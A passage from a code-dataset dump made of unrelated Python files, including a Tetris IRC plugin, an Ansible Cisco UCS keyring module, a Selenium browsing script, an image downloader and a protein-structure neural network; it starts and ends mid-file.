nextpl)\n left = [\"\\x0312⡇\\x03 Current: \"] + ([\"\\x0312⡇\\x03 \"] * (height - 1))\n mid = [\"\\x0f · Next: \"] + ([\"\\x0f \"] * (height - 1))\n lines = zip(left, currentp, mid, nextp)\n lines = [\"%s%s%s%s\" % s for s in lines]\n lines[0] += \"\\x0f · Score: %d\" % player[\"score\"]\n return \"\\n\".join(lines) \n\n def format_game(self, game):\n out = \"₀₁₂₃₄₅₆₇₈₉\\n\"\n out += self.draw([[game.players[p][\"color\"] if p is not None else 0 for p in row] for row in game.board])\n return out + \"\\n₀₁₂₃₄₅₆₇₈₉\"\n\n def overlaps(self, board, piece, xy):\n xoff, yoff = xy\n for y, row in enumerate(piece):\n for x, v in enumerate(row):\n if v and (y + yoff >= len(board) or board[y+yoff][x+xoff] is not None):\n return True\n return False\n\n @command\n def piece(self, server, message):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n return self.format_user(player)\n\n @command(\"turn\", \"(\\d*)\")\n def turn(self, server, message, num):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n if num:\n num = int(num) % 4\n else:\n num = 1\n for i in range(num):\n player['pieces'][0] = list(zip(*player['pieces'][0][::-1]))\n return self.format_user(player)\n\n @command\n def tetris(self, server, message):\n game = self.ensure_created(message.context, message.address.nick)\n return self.format_game(game)\n\n @command(\"drop\", \"(\\d+)\")\n def drop(self, server, message, index: int):\n game = self.ensure_created(message.context, message.address.nick)\n player = game.players[self.server.lower(message.address.nick)]\n piece = player['pieces'][0]\n xoff = int(index)\n yoff = 0\n\n # Bounds check for index\n if not (0 <= xoff <= (len(game.board[0]) - (len(piece[0]) if piece is not None else 1))):\n return \"\\x034⡇\\x03 Invalid index\"\n\n player['pieces'] = [player['pieces'][1], game.rand_piece()]\n\n # Calculate where the blocks fall\n while not self.overlaps(game.board, piece or [[1]], (xoff, yoff)):\n yoff += 1\n yoff -= 1\n if yoff < 0 and piece is not None:\n # Trigger a purge\n for y, row in enumerate(game.board):\n for x, v in enumerate(row):\n if v == self.server.lower(message.address.nick):\n game.board[y][x] = None\n server.message(self.format_user(player), message.address.nick, \"NOTICE\")\n return self.format_game(game)\n\n if piece is None:\n yoff += 1\n for x, y in [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1)]:\n if 0 <= y + yoff < len(game.board) and 0 <= x + xoff < len(game.board[0]):\n game.board[y+yoff][x+xoff] = None\n else:\n for y, row in enumerate(piece):\n for x, v in enumerate(row):\n if v:\n game.board[y+yoff][x+xoff] = self.server.lower(message.address.nick)\n\n # Eliminate pieces\n full = []\n for i, row in enumerate(game.board):\n if all(row):\n for p in row:\n game.players[p][\"score\"] += 1\n full.append(i)\n for i in full:\n del game.board[i]\n game.board = [[None for i in range(game.size[0])]] + game.board\n server.message(self.format_user(player), message.address.nick, \"NOTICE\")\n return self.format_game(game)\n\n\n__initialise__ = Tetris","sub_path":"plugins/games/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491780506","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 12:14:01 2019\n\n@author: Kycool13\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the hourglassSum function below.\ndef hourglassSum(arr):\n hourGlasses = 0;\n hgCurrent = -sys.maxsize;\n rows = 0; \n for h in range(4):\n for i in range(4):\n hgSum = 0 \n for k in range(i,i + 3):\n hgSum += arr[rows][k]; \n hgSum += arr[rows+1][i+1];\n for j in range(i,i + 3):\n hgSum += arr[rows+2][j];\n hourGlasses +=1;\n if(hgCurrent= 400:\n race.append('black')\n elif 20 <= weight[i] < 150:\n race.append('pink')\n elif 150 <= weight[i] < 250:\n race.append('brown')\n elif 250 <= weight[i] < 400:\n race.append('black')\n\ndata = pd.DataFrame({'weight': weight, 'taste': taste, 'race': race})\ndata.to_csv('data/pig.csv', index=False)","sub_path":"data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95455727","text":"from datetime import date\n\n\ndef next_birthday(day, births):\n # assert births, 'No data...'\n remaining_days = float('inf')\n # Convert tuples to dates.\n today = date(*day)\n for name, birth in births.items():\n birthdate = date(*birth)\n # assert today >= birthdate, f'{name} is not born yet!'\n # Find the next birthday of `name`.\n for year in (today.year, today.year + 1):\n try:\n birthday = birthdate.replace(year=year)\n except ValueError:\n # If \"February 29th\" does not exists then it is \"March 1st\".\n birthday = date(year, 3, 1)\n if birthday >= today:\n break\n days = (birthday - today).days\n if days < remaining_days:\n remaining_days, ages = days, {}\n if days == remaining_days:\n ages[name] = birthday.year - birthdate.year\n return [remaining_days, ages]\n","sub_path":"verification/my_solution.py","file_name":"my_solution.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478413699","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncoordinate library\n~~~~~~~~~~~~~~~~~~\n\nCoordinate is a grid converter, written in Python, for human beings.\n\n >>> import coordinate\n >>> c = coordinate.latlng(12.345, 23.4423)\n >>> c.mgrs\n 200\n\n\n\"\"\"\n\n__title__ = 'coordinate'\n__version__ = '0.0.1'\n__author__ = 'Cpl Denis Carriere'\n\nfrom .api import all, mgrs, mercator, utm, dms\n","sub_path":"lib/coordinate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587598057","text":"#coding=utf-8\nfrom selenium import webdriver\nimport time\nwf=webdriver.Firefox()\nwf.get(\"http://www.bilibili.com\")\nwf.implicitly_wait(2)\nhandle=wf.current_window_handle\nprint(handle)\nwf.find_element_by_id(\"search-keyword\").send_keys(\"王老菊\")\nwf.find_element_by_class_name(\"search-submit\").click()\nwf.implicitly_wait(2)\nhandle_all=wf.window_handles\nprint(handle_all)\nwf.switch_to_window(handle_all[1])\nwf.find_element_by_xpath(\"html/body/div[5]/ul/li[3]/div/div[1]/a\").click()\nhandle_all=wf.window_handles\nprint(handle_all)\nwf.switch_to_window(handle_all[2])\ntime.sleep(5)\nwf.maximize_window()\nwf.quit()\n","sub_path":"selenium demo(test)/bili.py","file_name":"bili.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172689325","text":"#!/usr/bin/env python\n\nfrom ansible.module_utils.basic import *\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: cisco_ucs_keyring\nshort_description: configures keyring on a cisco ucs server\nversion_added: 0.9.0.0\ndescription:\n - configures keyring on a cisco ucs server\noptions:\n state:\n description:\n - if C(present), will perform create/add/enable operation\n - if C(absent), will perform delete/remove/disable operation\n required: false\n choices: ['present', 'absent']\n default: \"present\"\n name:\n version_added: \"1.0(1e)\"\n description: key ring name\n required: true\n modulus:\n version_added: \"1.0(1e)\"\n description: modulus\n required: false\n choices: ['mod2048', 'mod2560', 'mod3072', 'mod3584', 'mod4096', 'modinvalid']\n default: \"mod2048\"\n regen:\n version_added: \"1.0(1e)\"\n description: regen\n required: false\n choices: ['yes', 'no']\n default: \"no\"\n policy_owner:\n version_added: \"2.1(1a)\"\n description: policy owner\n required: false\n choices: ['local', 'pending-policy', 'policy']\n default: \"local\"\n tp:\n version_added: \"1.0(1e)\"\n description: trusted point name\n required: false\n cert:\n version_added: \"1.0(1e)\"\n description: certificate text\n required: false\n descr:\n version_added: \"1.0(1e)\"\n description: description\n required: false\n\nrequirements: ['ucsmsdk', 'ucsm_apis']\nauthor: \"Cisco Systems Inc(ucs-python@cisco.com)\"\n'''\n\n\nEXAMPLES = '''\n- name:\n cisco_ucs_keyring:\n name: \"testkeyring\"\n modulus: \"mod2048\"\n regen: \"no\"\n policy_owner: \"local\"\n tp: \"testtp\"\n cert: \"certificatetext\"\n descr: \"description\"\n state: \"present\"\n ucs_ip: \"192.168.1.1\"\n ucs_username: \"admin\"\n ucs_password: \"password\"\n'''\n\n\ndef _argument_mo():\n return dict(\n name=dict(required=True, type='str'),\n modulus=dict(type='str',\n choices=['mod2048', 'mod2560', 'mod3072', 'mod3584',\n 'mod4096', 'modinvalid'],\n default=\"mod2048\"),\n regen=dict(type='str', choices=['yes', 'no'], default=\"no\"),\n policy_owner=dict(type='str',\n choices=['local', 'pending-policy', 'policy'],\n default=\"local\"),\n tp=dict(type='str'),\n cert=dict(type='str'),\n descr=dict(type='str'),\n )\n\n\ndef _argument_custom():\n return dict(\n state=dict(default=\"present\",\n choices=['present', 'absent'],\n type='str'),\n )\n\n\ndef _argument_connection():\n return dict(\n # UcsHandle\n ucs_server=dict(type='dict'),\n\n # Ucs server credentials\n ucs_ip=dict(type='str'),\n ucs_username=dict(default=\"admin\", type='str'),\n ucs_password=dict(type='str', no_log=True),\n ucs_port=dict(default=None),\n ucs_secure=dict(default=None),\n ucs_proxy=dict(default=None)\n )\n\n\ndef _ansible_module_create():\n argument_spec = dict()\n argument_spec.update(_argument_mo())\n argument_spec.update(_argument_custom())\n argument_spec.update(_argument_connection())\n\n return AnsibleModule(argument_spec,\n supports_check_mode=True)\n\n\ndef _get_mo_params(params):\n from ansible.module_utils.cisco_ucs import UcsConnection\n args = {}\n for key in _argument_mo():\n if params.get(key) is None:\n continue\n args[key] = params.get(key)\n return args\n\n\ndef setup_keyring(server, module):\n from ucsm_apis.admin.keyring import key_ring_create\n from ucsm_apis.admin.keyring import key_ring_delete\n from ucsm_apis.admin.keyring import key_ring_exists\n\n ansible = module.params\n args_mo = _get_mo_params(ansible)\n exists, mo = key_ring_exists(handle=server, **args_mo)\n\n if ansible[\"state\"] == \"present\":\n if module.check_mode or exists:\n return not exists\n key_ring_create(handle=server, **args_mo)\n else:\n if module.check_mode or not exists:\n return exists\n key_ring_delete(server, mo.name)\n\n return True\n\n\ndef setup(server, module):\n result = {}\n err = False\n\n try:\n result[\"changed\"] = setup_keyring(server, module)\n except Exception as e:\n err = True\n result[\"msg\"] = \"setup error: %s \" % str(e)\n result[\"changed\"] = False\n\n return result, err\n\n\ndef main():\n from ansible.module_utils.cisco_ucs import UcsConnection\n\n module = _ansible_module_create()\n conn = UcsConnection(module)\n server = conn.login()\n result, err = setup(server, module)\n conn.logout()\n if err:\n module.fail_json(**result)\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/ucsm-config/library/cisco_ucs_keyring.py","file_name":"cisco_ucs_keyring.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"449000628","text":"import curses\nimport threading\nimport time\nimport Queue\n\n\ndef curse_open():\n screen = curses.initscr()\n curses.noecho()\n curses.cbreak()\n screen.keypad(1)\n return screen\n\n\ndef curse_close(screen):\n if screen:\n screen.keypad(0)\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n\n\nclass Consumer(threading.Thread):\n def __init__(self, economy):\n super(Consumer, self).__init__()\n self.economy = economy\n\n self.screen = None\n\n self.queue = Queue.Queue()\n\n def run(self):\n self.economy.consumer_started.set()\n self.economy.producer_started.wait()\n\n try:\n self.screen = curse_open()\n\n while self.economy.producer.is_alive():\n self.consume()\n\n raise curses.error\n except:\n curse_close(self.screen)\n\n def consume(self):\n pkg = self.queue.get()\n msg = \"Pkg rcvd @ \" + str(time.time())\n self.screen.addstr(pkg + \"; \" + msg + \"\\n\")\n self.screen.refresh()\n time.sleep(1)\n\n\nclass Producer(threading.Thread):\n def __init__(self, economy):\n super(Producer, self).__init__()\n self.economy = economy\n\n def run(self):\n self.economy.producer_started.set()\n self.economy.consumer_started.wait()\n\n while self.economy.consumer.is_alive():\n self.produce()\n\n def produce(self):\n pkg = \"Pkg prcd @ \" + str(time.time())\n self.economy.consumer.queue.put(pkg)\n time.sleep(1)\n\n\nclass Economy:\n def __init__(self):\n self.consumer = Consumer(self)\n self.producer = Producer(self)\n\n self.consumer_started = threading.Event()\n self.producer_started = threading.Event()\n\n self.producer.start()\n self.consumer.start()\n\nEconomy()","sub_path":"threading2.py","file_name":"threading2.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418129270","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom ContributorEntryDialog import ContributorEntryDialog\n\nclass ContributorListCtrl(wx.ListCtrl):\n def __init__(self,parent):\n wx.ListCtrl.__init__(self,parent,armid.PROJECTSETTINGS_LISTCONTRIBUTORS_ID,size=wx.DefaultSize,style=wx.LC_REPORT | wx.LC_SORT_ASCENDING)\n self.InsertColumn(0,'Firstname')\n self.SetColumnWidth(0,100)\n self.InsertColumn(1,'Surname')\n self.SetColumnWidth(0,100)\n self.InsertColumn(2,'Affiliation')\n self.SetColumnWidth(2,100)\n self.InsertColumn(3,'Role')\n self.SetColumnWidth(3,100)\n self.theSelectedIdx = -1\n self.theMenu = wx.Menu()\n self.theMenu.Append(armid.CONTRIBUTORLISTCTRL_MENUADD_ID,'Add')\n self.theMenu.Append(armid.CONTRIBUTORLISTCTRL_MENUDELETE_ID,'Delete')\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK,self.OnRightDown)\n self.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnItemSelected)\n self.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnItemDeselected)\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED,self.onEntryActivated)\n wx.EVT_MENU(self.theMenu,armid.CONTRIBUTORLISTCTRL_MENUADD_ID,self.onAddEntry)\n wx.EVT_MENU(self.theMenu,armid.CONTRIBUTORLISTCTRL_MENUDELETE_ID,self.onDeleteEntry)\n\n def OnItemSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def OnItemDeselected(self,evt):\n self.theSelectedIdx = -1\n\n def OnRightDown(self,evt):\n self.PopupMenu(self.theMenu)\n\n def onAddEntry(self,evt):\n dlg = ContributorEntryDialog(self)\n if (dlg.ShowModal() == armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID):\n firstName = dlg.firstName()\n surname = dlg.surname()\n affiliation = dlg.affiliation()\n role = dlg.role()\n idx = self.GetItemCount()\n self.InsertStringItem(idx,firstName)\n self.SetStringItem(idx,1,surname)\n self.SetStringItem(idx,2,affiliation)\n self.SetStringItem(idx,3,role)\n\n def onDeleteEntry(self,evt):\n if (self.theSelectedIdx == -1):\n errorText = 'No entry selected'\n errorLabel = 'Delete definition'\n dlg = wx.MessageDialog(self,errorText,errorLabel,wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n else:\n selectedValue = self.GetItemText(self.theSelectedIdx)\n self.DeleteItem(self.theSelectedIdx)\n\n def onEntryActivated(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n firstName = self.GetItemText(self.theSelectedIdx)\n surname = self.GetItem(self.theSelectedIdx,1)\n affiliation = self.GetItem(self.theSelectedIdx,2)\n role = self.GetItem(self.theSelectedIdx,3)\n \n dlg = ContributorEntryDialog(self,firstName,surname.GetText(),affiliation.GetText(),role.GetText())\n if (dlg.ShowModal() == armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID):\n self.SetStringItem(self.theSelectedIdx,0,dlg.firstName())\n self.SetStringItem(self.theSelectedIdx,1,dlg.surname())\n self.SetStringItem(self.theSelectedIdx,2,dlg.affiliation())\n self.SetStringItem(self.theSelectedIdx,3,dlg.role())\n\n def load(self,entries):\n for firstName,surname,affiliation,role in entries:\n idx = self.GetItemCount()\n self.InsertStringItem(idx,firstName)\n self.SetStringItem(idx,1,surname)\n self.SetStringItem(idx,2,affiliation)\n self.SetStringItem(idx,3,role)\n\n def dimensions(self):\n entries = []\n for x in range(self.GetItemCount()):\n firstName = self.GetItemText(x)\n surname = self.GetItem(x,1)\n affiliation = self.GetItem(x,2)\n role = self.GetItem(x,3)\n entries.append((firstName,surname.GetText(),affiliation.GetText(),role.GetText()))\n return entries\n","sub_path":"cairis/cairis/ContributorListCtrl.py","file_name":"ContributorListCtrl.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452101633","text":"import argparse\nimport os\nimport sys\nimport json\n\nsys.path.append('../classes/')\nfrom imagetype import ImgType\nfrom dlthread import Downloader\n\n\ndef main():\n\n if FLAGS.type == 'txt':\n getimgtypestxt(FLAGS.output_dir, FLAGS.input_file)\n else:\n getimgtypesfromjson(FLAGS.output_dir, FLAGS.input_file)\n\ndef chunks(l, n):\n return [l[i::n] for i in range(n)]\n\n\ndef getimgtypesfromtxt(path, filename):\n result = []\n nb = 0\n with open(filename) as file:\n for line in file:\n nb += 1\n temp = str(line.rstrip()).split(\"\\t\")\n result.append(ImgType(temp[0], temp[1]))\n\n out = os.path.join(os.getcwd(), path)\n\n li = chunks(result, 5)\n\n t1 = Downloader(li[0], out, '\\x1b[0;30;44m')\n\n t2 = Downloader(li[1], out, '\\x1b[0;30;45m')\n t3 = Downloader(li[3], out, '\\x1b[0;30;46m')\n\n t4 = Downloader(li[4], out, '\\x1b[0;30;47m')\n\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n return nb\n\n\n\ndef getimgtypesfromjson(path, filename):\n\n result = []\n nb = 0\n with open(filename) as file:\n data = json.load(file)\n\n\n for key in data.keys():\n for row in data[key]:\n nb += 1\n result.append(ImgType(key, row))\n\n out = os.path.join(os.getcwd(), path)\n\n li = chunks(result, 5)\n\n t1 = Downloader(li[0], out, '\\x1b[0;30;44m')\n\n t2 = Downloader(li[1], out, '\\x1b[0;30;45m')\n t3 = Downloader(li[3], out, '\\x1b[0;30;46m')\n\n t4 = Downloader(li[4], out, '\\x1b[0;30;47m')\n\n t1.start()\n t2.start()\n t3.start()\n t4.start()\n\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n\n return nb\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_file', type=str, default='vis10cat.txt',\n help='Select input file default : vis10cat.txt ')\n parser.add_argument('--output_dir', type=str, default=str(os.getcwd()),\n help='Set ouput directory (default current)')\n\n parser.add_argument('--type', type=str, default=\"txt\",\n help='Set input type default (txt) alt : json')\n\n\n FLAGS, unparsed = parser.parse_known_args()\n main()\n","sub_path":"datasetManager/multidownload/readerDL.py","file_name":"readerDL.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215323087","text":"import numpy as np\nimport json\nimport tables\nfrom MWTracker.trackWorms.getFilteredSkels import _h_calAreaSignedArray\n\ndef hasExpCntInfo(skeletons_file):\n # i'm reading this data twice (one more in switchCntSingleWorm), but I think this is cleaner\n # from a function organization point of view.\n with tables.File(skeletons_file, 'r') as fid:\n if not '/experiment_info' in fid:\n return False\n exp_info_b = fid.get_node('/experiment_info').read()\n exp_info = json.loads(exp_info_b.decode(\"utf-8\"))\n\n # print('ventral_side:{}'.format(exp_info['ventral_side']))\n # only clockwise and anticlockwise are valid contour orientations\n return exp_info['ventral_side'] in ['clockwise', 'anticlockwise']\n\ndef isBadVentralOrient(skeletons_file):\n with tables.File(skeletons_file, 'r') as fid:\n exp_info_b = fid.get_node('/experiment_info').read()\n exp_info = json.loads(exp_info_b.decode(\"utf-8\"))\n\n if not exp_info['ventral_side'] in ['clockwise', 'anticlockwise']:\n raise ValueError(\n '\"{}\" is not a valid value for '\n 'ventral side orientation. Only \"clockwise\" or \"anticlockwise\" '\n 'are accepted values'.format(\n exp_info['ventral_side']))\n\n has_skeletons = fid.get_node('/trajectories_data').col('has_skeleton')\n\n # let's use the first valid skeleton, it seems like a waste to use all the other skeletons.\n # I checked earlier to make sure the have the same orientation.\n\n valid_ind = np.where(has_skeletons)[0]\n if valid_ind.size == 0:\n return\n\n cnt_side1 = fid.get_node('/contour_side1')[valid_ind[0], :, :]\n cnt_side2 = fid.get_node('/contour_side2')[valid_ind[0], :, :]\n A_sign = _h_calAreaSignedArray(cnt_side1, cnt_side2)\n\n # if not (np.all(A_sign > 0) or np.all(A_sign < 0)):\n # raise ValueError('There is a problem. All the contours should have the same orientation.')\n\n return (exp_info['ventral_side'] == 'clockwise' and A_sign[0] < 0) or \\\n (exp_info['ventral_side'] == 'anticlockwise' and A_sign[0] > 0)\n\n\ndef switchCntSingleWorm(skeletons_file):\n # change contours if they do not match the known orientation\n if isBadVentralOrient(skeletons_file):\n with tables.File(skeletons_file, 'r+') as fid:\n # since here we are changing all the contours, let's just change\n # the name of the datasets\n side1 = fid.get_node('/contour_side1')\n side2 = fid.get_node('/contour_side2')\n\n side1.rename('contour_side1_bkp')\n side2.rename('contour_side1')\n side1.rename('contour_side2')","sub_path":"MWTracker/featuresAnalysis/correctVentralDorsal.py","file_name":"correctVentralDorsal.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193992249","text":"import os, sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch.optim as optim\n\n\n#from src \\\nimport graphOps as GO\n#from src \\\nimport utils\n\ndef intTanh(x):\n # s always has real part >= 0\n s = torch.sign(x) * x\n p = torch.exp(-2 * s)\n return s + torch.log1p(p) - np.log(2)\n\ndef tanhsq(x, a=0.1):\n # s always has real part >= 0\n return torch.tanh(a*x)**2\n\ndef dtanhsq(x, a=0.1):\n # s always has real part >= 0\n return 2*a*torch.tanh(a*x)*(1-torch.tanh(a*x)**2)\n\n\ndef doubleLayer(x, K1, K2):\n x = F.conv1d(x, K1.unsqueeze(2))\n x = F.instance_norm(x)\n x = torch.tanh(x)\n\n x = F.conv1d(x, K2.unsqueeze(2))\n\n return x\n\ndef getBondAngle(T, Mask):\n\n n = T.shape\n T = T.reshape(n[0],n[1],3,4,n[3])\n A = T[:,:,:,0,:]\n dA = A[:, :, :, 1:] - A[:,:,:,:-1]\n Am = dA[:, :, :,:-1]\n Ap = dA[:, :, :, 1:]\n\n n1 = Am/torch.sqrt(torch.sum(Am**2,dim=2,keepdim=True)+1e-3)\n n2 = Ap/torch.sqrt(torch.sum(Ap**2,dim=2,keepdim=True)+1e-3)\n Cp = torch.zeros_like(A[:,:,0,:])\n Cp[:,:,1:-1] = torch.sum(n1*n2,dim=2)\n Cp = Mask*Cp\n return Cp\n\ndef vectorCrossProd(n1, n2):\n # V1 = [B, C, 3 N]\n # V2 = [B, C, 3, N]\n # vy*wz - vz*wy\n # vz*wx - vx*wz\n # vx*wy - vy*wx\n\n Cx = (n1[:, :, 1, :] * n2[:, :, 2, :] - n1[:, :, 2, :] * n2[:, :, 1, :]).unsqueeze(2)\n Cy = (n1[:, :, 2, :] * n2[:, :, 0, :] - n1[:, :, 0, :] * n2[:, :, 2, :]).unsqueeze(2)\n Cz = (n1[:, :, 0, :] * n2[:, :, 1, :] - n1[:, :, 1, :] * n2[:, :, 0, :]).unsqueeze(2)\n\n C = torch.cat((Cx, Cy, Cz), dim=2)\n\n return C\n\n\ndef torsionAngle(V1,V2,V3,V4):\n\n A = V2 - V1\n B = V3 - V2\n C = V4 - V3\n\n Bsq = torch.relu(torch.sum(B * B, dim=2, keepdim=True))\n AC = torch.sum(A * C, dim=2, keepdim=True)\n AB = torch.sum(A * B, dim=2, keepdim=True)\n BC = torch.sum(B * C, dim=2, keepdim=True)\n x = -torch.sum(Bsq*AC, dim=2, keepdim=True) + torch.sum(AB*BC, dim=2, keepdim=True)\n\n absB = torch.sqrt(Bsq).sum(dim=2, keepdim=True)\n BxC = vectorCrossProd(B, C)\n y = torch.sum((absB*A)*BxC, dim=2, keepdim=True)\n\n cosTheta = x/torch.sqrt(x**2 + y**2 + 1e-3)\n sinTheta = y/torch.sqrt(x**2 + y**2 + 1e-3)\n theta = torch.arccos(cosTheta)\n theta = theta*torch.sign(y)\n return theta, cosTheta, sinTheta\n\ndef getTorsionAngles(x):\n # The coords are organized as (Ca, C, N)\n nnodes = x.shape[-1]\n Ca = x[:, :, :3, :-1]\n C = x[:, :, 3:6, :-1]\n N = x[:, :, 6:9, :-1]\n Ca2 = x[:, :, :3, 1:]\n C2 = x[:, :, 3:6, 1:]\n N2 = x[:, :, 6:9, 1:]\n # Compute w = tor(Ca,C,N,Ca)\n omega, cosOmega, sinOmega = torsionAngle(Ca,C,N2,Ca2)\n\n # Compute phi = tor(C,N,Ca,C2)\n phi, cosPhi, sinPhi = torsionAngle(C,N2,Ca2,C2)\n\n # Compute psi = tor(N, Cα, C, N2)\n psi, cosPsi, sinPsi = torsionAngle(N, Ca, C, N2)\n\n #tor = torch.cat((omega, phi, psi), dim=2)\n\n phi = phi[0,0,0,:-1].squeeze()\n cosPhi = cosPhi[0,0,0,:-1].squeeze()\n sinPhi = sinPhi[0,0,0,:-1].squeeze()\n\n psi = psi[0,0,0, 1:].squeeze()\n cosPsi = cosPsi[0,0,0, 1:].squeeze()\n sinPsi = sinPsi[0,0,0, 1:].squeeze()\n\n omega = omega[0,0,0, 1:].squeeze()\n cosOmega = cosOmega[0,0,0, 1:].squeeze()\n sinOmega = sinOmega[0,0,0, 1:].squeeze()\n\n\n tor = torch.zeros(3,nnodes)\n tor[0, 1:-1] = phi\n tor[1, 1:-1] = psi\n tor[2, 1:-1] = omega\n\n torS = torch.stack((cosOmega, sinOmega, cosPhi, sinPhi, cosPsi, sinPsi), dim=0)\n torS = torch.cat((torch.zeros(6,1), torS, torch.zeros(6,1)),dim=1)\n return tor, torS\n\n\ndef getNodeDistance(T, Graph, Mask=[]):\n # Energy of all the nonconstant distances\n # Data organized as A C N B\n\n if len(Mask) == 0:\n Mask = torch.ones(1,1,T.shape[3])\n\n MaskE = Graph.nodeAve(Mask)\n inValidInd = MaskE<1\n\n n = T.shape\n nnodes = n[-1]\n\n T = T.reshape(n[0], n[1], 4, 3, nnodes)\n\n I = torch.tensor([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], device=T.device)\n J = torch.tensor([0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3], device=T.device)\n # K = [1, 3, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n TI = T[:, :, I, :, :]\n TJ = T[:, :, J, :, :]\n G = TI[:, :, :, :, Graph.iInd] - TJ[:, :, :, :, Graph.jInd]\n\n f = torch.sum(G ** 2, dim=3)\n\n f[:, :, :, inValidInd.squeeze()] = 0\n return f\n\n\n\nclass energyGraphNetwork(nn.Module):\n\n def __init__(self, Nopen, nlayer, h=0.1):\n super(energyGraphNetwork, self).__init__()\n\n self.h = h\n nodeFeatIn = 41+6 # PSSM+Seq+Tor\n EdgeFeatIn = 16 # distances\n self.K1Nopen = nn.Parameter(torch.randn(Nopen, nodeFeatIn))\n self.K2Nopen = nn.Parameter(torch.randn(Nopen, Nopen))\n\n self.K1Eopen = nn.Parameter(torch.randn(Nopen, EdgeFeatIn))\n self.K2Eopen = nn.Parameter(torch.randn(Nopen, Nopen))\n\n nopen = 3*Nopen\n self.nopen = nopen\n\n Id = (torch.cat((torch.eye(nopen,nopen),torch.eye(nopen,nopen)), dim=1)).unsqueeze(0)\n IdTensor = torch.repeat_interleave(Id, nlayer, dim=0)\n self.KE = nn.Parameter(IdTensor)\n\n self.Kclose = nn.Parameter(torch.randn(1, nopen)*1e-2)\n\n def forward(self, SeqData, Coords, Graph, M=torch.ones(1)):\n\n ME = torch.ones(1)\n if len(M)>1:\n ME = Graph.nodeGrad(M)\n ME[ME<1] = 0\n\n xe = getNodeDistance(Coords, Graph, Mask=[])\n xe = xe - torch.mean(xe, dim=3, keepdim=True)\n _, xn = getTorsionAngles(Coords)\n xn = torch.cat((xn.unsqueeze(0), SeqData),dim=1)\n #xn = SeqData\n xn = doubleLayer(xn, self.K1Nopen, self.K2Nopen)\n xe = doubleLayer(xe.squeeze(1), self.K1Eopen, self.K2Eopen)\n\n xn = torch.cat([xn, Graph.edgeDiv(xe), Graph.edgeAve(xe)], dim=1)\n xn = xn - xn.mean(dim=2, keepdim=True)\n\n nlayers = self.KE.shape[0]\n\n for i in range(nlayers):\n\n gradX = ME*Graph.nodeGrad(xn)\n intX = ME*Graph.nodeAve(xn)\n\n xe = torch.cat([gradX, intX], dim=1)\n #xe = doubleLayer(xe, self.KE1[i], self.KE2[i])\n xe = doubleLayer(xe, self.KE[i], self.KE[i].t())\n\n divE = M*Graph.edgeDiv(xe[:,:self.nopen,:])\n aveE = 